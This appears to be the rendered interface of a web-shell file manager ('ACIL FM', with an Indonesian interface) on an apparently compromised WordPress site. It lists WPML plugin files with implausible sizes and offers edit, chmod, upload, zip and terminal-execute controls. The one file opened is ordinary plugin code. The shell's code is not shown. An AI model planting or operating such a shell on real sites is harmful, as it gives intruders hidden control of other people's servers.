ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site/wp-content/plugins/wpml-string-translation/inc
/
home
mhhtmff
www
site
wp-content
plugins
wpml-string-translation
inc
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
admin-texts
-
chmod
Open
Rename
Delete
gettext
-
chmod
Open
Rename
Delete
package-translation
-
chmod
Open
Rename
Delete
auto-download-locales.php
13.85 MB
chmod
View
DL
Edit
Rename
Delete
constants.php
1.13 MB
chmod
View
DL
Edit
Rename
Delete
functions-load.php
493 B
chmod
View
DL
Edit
Rename
Delete
functions.php
34.02 MB
chmod
View
DL
Edit
Rename
Delete
lang-map.csv
865 B
chmod
View
DL
Edit
Rename
Delete
potx-callback.php
994 B
chmod
View
DL
Edit
Rename
Delete
potx.php
24.48 MB
chmod
View
DL
Edit
Rename
Delete
private-actions.php
2.13 MB
chmod
View
DL
Edit
Rename
Delete
private-filters.php
1.88 MB
chmod
View
DL
Edit
Rename
Delete
wpml-localization.class.php
4.94 MB
chmod
View
DL
Edit
Rename
Delete
wpml-st-string-update.class.php
6.26 MB
chmod
View
DL
Edit
Rename
Delete
wpml-string-translation.class.php
29.69 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site/wp-content/plugins/wpml-string-translation/inc/potx-callback.php
<?php function wpml_st_pos_scan_store_results( $string, $domain, $context, $file, $line ) { global $__wpml_st_po_file_content; static $strings = array(); $key = md5( $domain . $context . $string ); //avoid duplicates if ( isset( $strings[ $key ] ) ) { return false; } $strings[ $key ] = true; $file = @file( $file ); if ( ! empty( $file ) ) { $__wpml_st_po_file_content .= PHP_EOL; $__wpml_st_po_file_content .= '# ' . @trim( $file[ $line - 2 ] ) . PHP_EOL; $__wpml_st_po_file_content .= '# ' . @trim( $file[ $line - 1 ] ) . PHP_EOL; $__wpml_st_po_file_content .= '# ' . @trim( $file[ $line ] ) . PHP_EOL; } //$__wpml_st_po_file_content .= 'msgid "'.str_replace('"', '\"', $string).'"' . PHP_EOL; $__wpml_st_po_file_content .= PHP_EOL; if ( $context ) { $__wpml_st_po_file_content .= 'msgctxt "' . addslashes( $context ) . '"' . PHP_EOL; } $__wpml_st_po_file_content .= 'msgid "' . $string . '"' . PHP_EOL; $__wpml_st_po_file_content .= 'msgstr ""' . PHP_EOL; }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply